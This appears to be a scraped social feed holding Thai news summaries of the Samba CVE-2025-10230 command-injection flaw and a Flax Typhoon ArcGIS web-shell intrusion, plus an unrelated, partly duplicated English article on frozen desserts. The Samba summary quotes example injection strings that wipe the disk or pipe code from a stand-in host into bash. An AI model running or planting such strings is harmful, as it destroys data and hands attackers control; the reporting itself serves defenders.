    มีผลเฉพาะกับ Samba AD DC ที่เปิด WINS และตั้งค่า “wins hook”
    WINS เป็นโปรโตคอลเก่าที่เชื่อถือ client โดยไม่ตรวจสอบ
    NetBIOS name ที่มี shell metacharacters เช่น ; หรือ | สามารถใช้โจมตีได้
    Samba ที่ไม่ใช่ domain controllerจะไม่ถูกกระทบ
    วิธีแก้ไขคือ ลบ “wins hook” หรือปิด WINS (wins support = no)
    เวอร์ชันที่ปลอดภัย ได้แก่ 4.23.2, 4.22.5 และ 4.21.9
    “wins hook” อาจถูกยกเลิกในเวอร์ชันอนาคต

    https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/
    🧨 “ช่องโหว่ CVE-2025-10230 บน Samba AD DC” — เสี่ยงถูกสั่งรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน ทีมพัฒนา Samba ได้ออกประกาศเตือนภัยร้ายแรงเกี่ยวกับช่องโหว่ CVE-2025-10230 ซึ่งมีคะแนน CVSS เต็ม 10.0 โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถสั่งรันคำสั่งบนระบบปฏิบัติการได้จากระยะไกลโดยไม่ต้องยืนยันตัวตน หากระบบนั้นเปิดใช้งาน WINS server และมีการตั้งค่า “wins hook” ในไฟล์ smb.conf ช่องโหว่นี้เกิดจากการที่ Samba ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเพียงพอ เมื่อมีการลงทะเบียนหรือเปลี่ยนชื่อ NetBIOS ผ่าน WINS server ระบบจะเรียกใช้โปรแกรมที่กำหนดไว้ใน “wins hook” โดยนำข้อมูลที่ผู้ใช้ส่งมาไปใส่ในคำสั่ง shell โดยตรง ซึ่งเปิดช่องให้แฮกเกอร์แทรกคำสั่งอันตราย เช่น ; rm -rf / หรือ | curl malicious.site | bash เนื่องจาก WINS เป็นโปรโตคอลเก่าที่เชื่อถือข้อมูลจาก client โดยไม่ตรวจสอบอย่างเข้มงวด ผู้โจมตีสามารถส่งชื่อ NetBIOS ที่มีความยาวไม่เกิน 15 ตัวอักษรและแฝงตัวอักขระ shell เพื่อรันคำสั่งบนเครื่องเป้าหมายได้ทันที ช่องโหว่นี้มีผลเฉพาะกับ Samba ที่ทำหน้าที่เป็น Active Directory Domain Controller และเปิดใช้งาน WINS พร้อมตั้งค่า “wins hook” เท่านั้น ส่วน Samba ที่เป็น member server หรือ standalone host จะไม่ได้รับผลกระทบ ทีม Samba แนะนำให้ผู้ดูแลระบบ: 🚑 ลบหรือไม่ตั้งค่า “wins hook” ใน smb.conf 🚑 ปิดการใช้งาน WINS server (wins support = no) 🚑 อัปเดตเป็นเวอร์ชันที่ปลอดภัย เช่น 4.23.2, 4.22.5 หรือ 4.21.9 ✅ ข้อมูลในข่าว ➡️ ช่องโหว่ CVE-2025-10230 มีคะแนน CVSS 10.0 เต็ม ➡️ เกิดจากการใช้ข้อมูลจาก client โดยไม่ตรวจสอบก่อนส่งเข้า shell ➡️ ส่งผลให้สามารถรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน ➡️ มีผลเฉพาะกับ Samba AD DC ที่เปิด WINS และตั้งค่า “wins hook” ➡️ WINS เป็นโปรโตคอลเก่าที่เชื่อถือ client โดยไม่ตรวจสอบ ➡️ NetBIOS name ที่มี shell metacharacters เช่น ; หรือ | สามารถใช้โจมตีได้ ➡️ Samba ที่ไม่ใช่ domain controllerจะไม่ถูกกระทบ ➡️ วิธีแก้ไขคือ ลบ “wins hook” หรือปิด WINS (wins support = no) ➡️ เวอร์ชันที่ปลอดภัย ได้แก่ 4.23.2, 4.22.5 และ 4.21.9 ➡️ “wins hook” อาจถูกยกเลิกในเวอร์ชันอนาคต https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/
    SECURITYONLINE.INFO
    Critical Samba RCE Flaw CVE-2025-10230 (CVSS 10.0) Allows Unauthenticated Command Injection on AD DCs
    Samba released an urgent fix for a Critical (CVSS 10.0) RCE flaw (CVE-2025-10230) allowing unauthenticated command injection on AD DCs when the WINS hook is enabled. Update to 4.23.2.
    0 Comments 0 Shares 149 Views 0 Reviews
  • “Flax Typhoon ฝัง Web Shell ใน ArcGIS SOE” — แฮกเกอร์จีนเข้าถึงระบบนานกว่า 1 ปีโดยใช้ซอฟต์แวร์ที่เชื่อถือได้เป็นช่องทางลับ

    กลุ่มแฮกเกอร์ที่ได้รับการสนับสนุนจากรัฐบาลจีนชื่อ “Flax Typhoon” หรือ “Ethereal Panda” ถูกเปิดโปงว่าใช้เทคนิคใหม่ในการแทรกซึมระบบองค์กรผ่าน ArcGIS โดยเปลี่ยน Java Server Object Extension (SOE) ที่ถูกต้องตามมาตรฐานให้กลายเป็น Web Shell แบบลับ ซึ่งสามารถควบคุมระบบได้โดยไม่ถูกตรวจจับ

    การโจมตีนี้กินเวลานานกว่า 12 เดือน โดยแฮกเกอร์ฝัง SOE ที่มี access key แบบ hardcoded ลงในระบบ และฝังไว้ในไฟล์ backup เพื่อให้กลับมาได้แม้ระบบจะถูกกู้คืนแล้วก็ตาม

    หลังจากเข้าถึงระบบผ่านบัญชีผู้ดูแล ArcGIS ที่ถูกขโมย พวกเขาใช้คำสั่ง base64 ที่ดูเหมือนคำสั่งปกติของ ArcGIS เพื่อหลบเลี่ยงการตรวจสอบ และใช้ API ของ ArcGIS ในการรันคำสั่ง PowerShell สร้าง VPN bridge ลับผ่านไฟล์ “bridge.exe” ที่ถูกแปลงชื่อจาก SoftEther VPN

    สุดท้าย Flax Typhoon พยายามเข้าถึง workstation ของ IT เพื่อขโมยข้อมูลจาก SAM และ LSA โดยใช้ RemoteRegistry และสร้างไฟล์ pass.txt.lnk เพื่อเก็บรหัสผ่าน

    ReliaQuest ซึ่งเป็นผู้เปิดเผยการโจมตีนี้ ระบุว่า Flax Typhoon มีแนวโน้มจะยังคงแฝงตัวอยู่ในเครือข่ายอื่น ๆ และมักทำงานในช่วงเวลาตรงกับเวลาทำการของจีน (00:00–06:00 UTC)

    ข้อมูลในข่าว
    Flax Typhoon เป็นกลุ่ม APT ที่ได้รับการสนับสนุนจากรัฐบาลจีน
    ใช้ ArcGIS SOE ที่ถูกต้องตามมาตรฐานแปลงเป็น Web Shell
    Web Shell มี access key แบบ hardcoded และฝังใน backup เพื่อความคงอยู่
    เข้าถึงระบบผ่านบัญชีผู้ดูแล ArcGIS ที่ถูกขโมย
    ใช้คำสั่ง base64 ผ่าน API เพื่อหลบเลี่ยงการตรวจจับ
    สร้าง VPN bridge ลับผ่านไฟล์ bridge.exe ที่แปลงชื่อจาก SoftEther VPN
    พยายามเข้าถึง workstation ของ IT เพื่อขโมย SAM และ LSA secrets
    สร้างไฟล์ pass.txt.lnk เพื่อเก็บรหัสผ่าน
    ReliaQuest ระบุว่า Flax Typhoon มีแนวโน้มยังแฝงตัวในเครือข่ายอื่น
    เวลาทำงานของกลุ่มตรงกับเวลาทำการของจีน (00:00–06:00 UTC)

    https://securityonline.info/china-backed-flax-typhoon-apt-maintained-year-long-access-by-turning-arcgis-soe-into-web-shell-backdoor/
    🌪️ “Flax Typhoon ฝัง Web Shell ใน ArcGIS SOE” — แฮกเกอร์จีนเข้าถึงระบบนานกว่า 1 ปีโดยใช้ซอฟต์แวร์ที่เชื่อถือได้เป็นช่องทางลับ กลุ่มแฮกเกอร์ที่ได้รับการสนับสนุนจากรัฐบาลจีนชื่อ “Flax Typhoon” หรือ “Ethereal Panda” ถูกเปิดโปงว่าใช้เทคนิคใหม่ในการแทรกซึมระบบองค์กรผ่าน ArcGIS โดยเปลี่ยน Java Server Object Extension (SOE) ที่ถูกต้องตามมาตรฐานให้กลายเป็น Web Shell แบบลับ ซึ่งสามารถควบคุมระบบได้โดยไม่ถูกตรวจจับ การโจมตีนี้กินเวลานานกว่า 12 เดือน โดยแฮกเกอร์ฝัง SOE ที่มี access key แบบ hardcoded ลงในระบบ และฝังไว้ในไฟล์ backup เพื่อให้กลับมาได้แม้ระบบจะถูกกู้คืนแล้วก็ตาม หลังจากเข้าถึงระบบผ่านบัญชีผู้ดูแล ArcGIS ที่ถูกขโมย พวกเขาใช้คำสั่ง base64 ที่ดูเหมือนคำสั่งปกติของ ArcGIS เพื่อหลบเลี่ยงการตรวจสอบ และใช้ API ของ ArcGIS ในการรันคำสั่ง PowerShell สร้าง VPN bridge ลับผ่านไฟล์ “bridge.exe” ที่ถูกแปลงชื่อจาก SoftEther VPN สุดท้าย Flax Typhoon พยายามเข้าถึง workstation ของ IT เพื่อขโมยข้อมูลจาก SAM และ LSA โดยใช้ RemoteRegistry และสร้างไฟล์ pass.txt.lnk เพื่อเก็บรหัสผ่าน ReliaQuest ซึ่งเป็นผู้เปิดเผยการโจมตีนี้ ระบุว่า Flax Typhoon มีแนวโน้มจะยังคงแฝงตัวอยู่ในเครือข่ายอื่น ๆ และมักทำงานในช่วงเวลาตรงกับเวลาทำการของจีน (00:00–06:00 UTC) ✅ ข้อมูลในข่าว ➡️ Flax Typhoon เป็นกลุ่ม APT ที่ได้รับการสนับสนุนจากรัฐบาลจีน ➡️ ใช้ ArcGIS SOE ที่ถูกต้องตามมาตรฐานแปลงเป็น Web Shell ➡️ Web Shell มี access key แบบ hardcoded และฝังใน backup เพื่อความคงอยู่ ➡️ เข้าถึงระบบผ่านบัญชีผู้ดูแล ArcGIS ที่ถูกขโมย ➡️ ใช้คำสั่ง base64 ผ่าน API เพื่อหลบเลี่ยงการตรวจจับ ➡️ สร้าง VPN bridge ลับผ่านไฟล์ bridge.exe ที่แปลงชื่อจาก SoftEther VPN ➡️ พยายามเข้าถึง workstation ของ IT เพื่อขโมย SAM และ LSA secrets ➡️ สร้างไฟล์ pass.txt.lnk เพื่อเก็บรหัสผ่าน ➡️ ReliaQuest ระบุว่า Flax Typhoon มีแนวโน้มยังแฝงตัวในเครือข่ายอื่น ➡️ เวลาทำงานของกลุ่มตรงกับเวลาทำการของจีน (00:00–06:00 UTC) https://securityonline.info/china-backed-flax-typhoon-apt-maintained-year-long-access-by-turning-arcgis-soe-into-web-shell-backdoor/
    SECURITYONLINE.INFO
    China-Backed Flax Typhoon APT Maintained Year-Long Access by Turning ArcGIS SOE into Web Shell Backdoor
    ReliaQuest exposed Flax Typhoon for a year-long breach, where the China-backed APT turned a legitimate ArcGIS Java SOE into a web shell and embedded it in backups to ensure persistence.
    0 Comments 0 Shares 127 Views 0 Reviews
  • Gelato vs. Ice Cream vs. Frozen Yogurt vs. Sherbet vs. Sorbet: Get The Scoop On The Difference

    You scream, I scream, we all scream for… wait, is that ice cream or gelato? Or frozen yogurt? And what’s the deal with sherbet and sorbet? Are all of these things ice cream, too?

    Don’t get a brain freeze. We’ll break down the similarities and technical differences between these frozen treats—based on ingredients and how they’re made—in addition to dipping into the overlap of the terms in casual use.

    Join as we serve up the answers to these questions and more:

    What defines ice cream?
    What is the difference between gelato and ice cream?
    How is ice cream different from frozen yogurt?
    Is sherbet a kind of ice cream?
    What is the difference between sherbet and sorbet?
    How is gelato different from sorbet?
    What is the difference between sorbet and ice cream?

    Quick summary

    We casually call a lot of frozen treats ice cream. But according to US technical guidelines, ice cream must contain 10 percent milk fat. It’s typically made with milk, cream, flavorings, and sometimes egg yolk. Gelato is similar to ice cream but typically contains less cream and air. Frozen yogurt uses yogurt as its primary ingredient rather than milk and cream. Unlike ice cream, sherbet uses fruit juice or fruit purée as its main ingredient and typically only has a small amount of dairy. Sorbet also uses fruit juice or purée as its main ingredient, but it doesn’t contain any dairy products or eggs.

    What is the difference between gelato and ice cream?

    Generally, the term ice cream refers to a creamy frozen dessert that’s made with dairy fats, sugar, and sometimes egg yolks. However, ice cream is often casually used as a catchall term to refer to all kinds of frozen desserts, including many of the ones that we’ll compare here, some of which do not contain cream or any dairy products.

    That being said, the definition of ice cream is often much more narrow in technical use. In fact, according to US law, in order for a food to be considered ice cream in the US it must contain at least 10 percent milk fat. The legal definition also touches on the inclusion of flavoring ingredients like sugar or artificial sweeteners and optional dairy products, such as cream, butter, buttermilk, and skim milk. Typically, egg yolks are also allowed as an ingredient. Ice cream typically contains a lot of cream in order to achieve the required milk fat percentage.

    Gelato is an Italian-style dessert that usually contains many of the same ingredients as ice cream. It’s often considered a type of ice cream—sometimes referred to as “Italian ice cream.”

    Compared to ice cream, though, gelato usually contains less cream and has a lower milk fat percentage. Additionally, the slower churning process of gelato causes it to be infused with less air than ice cream. All of this means that gelato tends to have a silkier texture than ice cream.

    frozen yogurt vs. ice cream

    Frozen yogurt (popularly nicknamed fro-yo) and ice cream are both typically made from dairy products and sugar. However, the main ingredients in ice cream are milk and cream and the main ingredient in frozen yogurt is, unsurprisingly, yogurt. Under certain technical requirements, ice cream must have at least 10 percent milk fat, but those requirements don’t apply to frozen yogurt. The fat percentage of frozen yogurt depends on what type of milk was used to make the yogurt in it.

    Is sherbet ice cream?

    Sherbet is a creamy frozen dessert made mainly from fruit juice or fruit purée—it typically contains only small amounts of dairy products, egg whites, and/or gelatin. (Sherbet is pronounced [ shur-bit ], but many people say [ shur-burt ], leading to spelling sherbert becoming increasingly common.)

    Sherbet is technically not ice cream, even though they both can contain fruit and dairy products. The big difference is that sherbet’s main ingredient is fruit juice or purée, while ice cream’s main ingredients are typically milk and cream. Still, they’re close enough that many people likely consider sherbet a type of ice cream.

    sherbet vs. sorbet

    As we just learned, sherbet typically contains only a small amount of dairy products and/or eggs. Sorbet (pronounced [ sawr-bey ]) is a creamy frozen concoction made from fruit juice or fruit purée that does not contain any dairy products or eggs. Sorbet is usually a dessert, but not always—it’s sometimes served between courses as a palate cleanser.

    The words look similar because they’re ultimately based on the same root—the Turkish şerbet, from the Persian sharbat, from the Arabic sharbah, meaning “a drink.”

    gelato vs. sorbet

    By now, you know that gelato traditionally uses milk and cream as its main ingredients, and that sorbet primarily contains fruit juice or fruit purée and does not use dairy products or eggs. Sorbet is less creamy.

    sorbet vs. ice cream

    The difference between ice cream and sorbet is also based on whether or not dairy is used. Technically speaking, ice cream always contains cream and/or milk as its main ingredients, while sorbet traditionally never includes dairy or eggs, instead being primarily made from fruit juice or fruit purée.

    sherbet vs. sorbet

    As we just learned, sherbet typically contains only a small amount of dairy products and/or eggs. Sorbet (pronounced [ sawr-bey ]) is a creamy frozen concoction made from fruit juice or fruit purée that does not contain any dairy products or eggs. Sorbet is usually a dessert, but not always—it’s sometimes served between courses as a palate cleanser.

    The words look similar because they’re ultimately based on the same root—the Turkish şerbet, from the Persian sharbat, from the Arabic sharbah, meaning “a drink.”

    gelato vs. sorbet

    By now, you know that gelato traditionally uses milk and cream as its main ingredients, and that sorbet primarily contains fruit juice or fruit purée and does not use dairy products or eggs. Sorbet is less creamy.

    sorbet vs. ice cream

    The difference between ice cream and sorbet is also based on whether or not dairy is used. Technically speaking, ice cream always contains cream and/or milk as its main ingredients, while sorbet traditionally never includes dairy or eggs, instead being primarily made from fruit juice or fruit purée.

    Get the inside scoop

    Here’s the final scoop: All of these distinctions are traditional and technical. As more dairy-free options become available, you’re much more likely to see many of these names applied to frozen desserts that include some nontraditional ingredients. In the case of ice cream, for example, fat sources used for the base may include ingredients like coconut milk, oat milk, or avocado.

    สงวนลิขสิทธิ์ © 2025 AAKKHRA & Co.
    Gelato vs. Ice Cream vs. Frozen Yogurt vs. Sherbet vs. Sorbet: Get The Scoop On The Difference You scream, I scream, we all scream for… wait, is that ice cream or gelato? Or frozen yogurt? And what’s the deal with sherbet and sorbet? Are all of these things ice cream, too? Don’t get a brain freeze. We’ll break down the similarities and technical differences between these frozen treats—based on ingredients and how they’re made—in addition to dipping into the overlap of the terms in casual use. Join as we serve up the answers to these questions and more: What defines ice cream? What is the difference between gelato and ice cream? How is ice cream different from frozen yogurt? Is sherbet a kind of ice cream? What is the difference between sherbet and sorbet? How is gelato different from sorbet? What is the difference between sorbet and ice cream? Quick summary We casually call a lot of frozen treats ice cream. But according to US technical guidelines, ice cream must contain 10 percent milk fat. It’s typically made with milk, cream, flavorings, and sometimes egg yolk. Gelato is similar to ice cream but typically contains less cream and air. Frozen yogurt uses yogurt as its primary ingredient rather than milk and cream. Unlike ice cream, sherbet uses fruit juice or fruit purée as its main ingredient and typically only has a small amount of dairy. Sorbet also uses fruit juice or purée as its main ingredient, but it doesn’t contain any dairy products or eggs. What is the difference between gelato and ice cream? Generally, the term ice cream refers to a creamy frozen dessert that’s made with dairy fats, sugar, and sometimes egg yolks. However, ice cream is often casually used as a catchall term to refer to all kinds of frozen desserts, including many of the ones that we’ll compare here, some of which do not contain cream or any dairy products. That being said, the definition of ice cream is often much more narrow in technical use. In fact, according to US law, in order for a food to be considered ice cream in the US it must contain at least 10 percent milk fat. The legal definition also touches on the inclusion of flavoring ingredients like sugar or artificial sweeteners and optional dairy products, such as cream, butter, buttermilk, and skim milk. Typically, egg yolks are also allowed as an ingredient. Ice cream typically contains a lot of cream in order to achieve the required milk fat percentage. Gelato is an Italian-style dessert that usually contains many of the same ingredients as ice cream. It’s often considered a type of ice cream—sometimes referred to as “Italian ice cream.” Compared to ice cream, though, gelato usually contains less cream and has a lower milk fat percentage. Additionally, the slower churning process of gelato causes it to be infused with less air than ice cream. All of this means that gelato tends to have a silkier texture than ice cream. frozen yogurt vs. ice cream Frozen yogurt (popularly nicknamed fro-yo) and ice cream are both typically made from dairy products and sugar. However, the main ingredients in ice cream are milk and cream and the main ingredient in frozen yogurt is, unsurprisingly, yogurt. Under certain technical requirements, ice cream must have at least 10 percent milk fat, but those requirements don’t apply to frozen yogurt. The fat percentage of frozen yogurt depends on what type of milk was used to make the yogurt in it. Is sherbet ice cream? Sherbet is a creamy frozen dessert made mainly from fruit juice or fruit purée—it typically contains only small amounts of dairy products, egg whites, and/or gelatin. (Sherbet is pronounced [ shur-bit ], but many people say [ shur-burt ], leading to spelling sherbert becoming increasingly common.) Sherbet is technically not ice cream, even though they both can contain fruit and dairy products. The big difference is that sherbet’s main ingredient is fruit juice or purée, while ice cream’s main ingredients are typically milk and cream. Still, they’re close enough that many people likely consider sherbet a type of ice cream. sherbet vs. sorbet As we just learned, sherbet typically contains only a small amount of dairy products and/or eggs. Sorbet (pronounced [ sawr-bey ]) is a creamy frozen concoction made from fruit juice or fruit purée that does not contain any dairy products or eggs. Sorbet is usually a dessert, but not always—it’s sometimes served between courses as a palate cleanser. The words look similar because they’re ultimately based on the same root—the Turkish şerbet, from the Persian sharbat, from the Arabic sharbah, meaning “a drink.” gelato vs. sorbet By now, you know that gelato traditionally uses milk and cream as its main ingredients, and that sorbet primarily contains fruit juice or fruit purée and does not use dairy products or eggs. Sorbet is less creamy. sorbet vs. ice cream The difference between ice cream and sorbet is also based on whether or not dairy is used. Technically speaking, ice cream always contains cream and/or milk as its main ingredients, while sorbet traditionally never includes dairy or eggs, instead being primarily made from fruit juice or fruit purée. sherbet vs. sorbet As we just learned, sherbet typically contains only a small amount of dairy products and/or eggs. Sorbet (pronounced [ sawr-bey ]) is a creamy frozen concoction made from fruit juice or fruit purée that does not contain any dairy products or eggs. Sorbet is usually a dessert, but not always—it’s sometimes served between courses as a palate cleanser. The words look similar because they’re ultimately based on the same root—the Turkish şerbet, from the Persian sharbat, from the Arabic sharbah, meaning “a drink.” gelato vs. sorbet By now, you know that gelato traditionally uses milk and cream as its main ingredients, and that sorbet primarily contains fruit juice or fruit purée and does not use dairy products or eggs. Sorbet is less creamy. sorbet vs. ice cream The difference between ice cream and sorbet is also based on whether or not dairy is used. Technically speaking, ice cream always contains cream and/or milk as its main ingredients, while sorbet traditionally never includes dairy or eggs, instead being primarily made from fruit juice or fruit purée. Get the inside scoop Here’s the final scoop: All of these distinctions are traditional and technical. As more dairy-free options become available, you’re much more likely to see many of these names applied to frozen desserts that include some nontraditional ingredients. In the case of ice cream, for example, fat sources used for the base may include ingredients like coconut milk, oat milk, or avocado. สงวนลิขสิทธิ์ © 2025 AAKKHRA & Co.
    0 Comments 0 Shares 191 Views 0 Reviews
More Results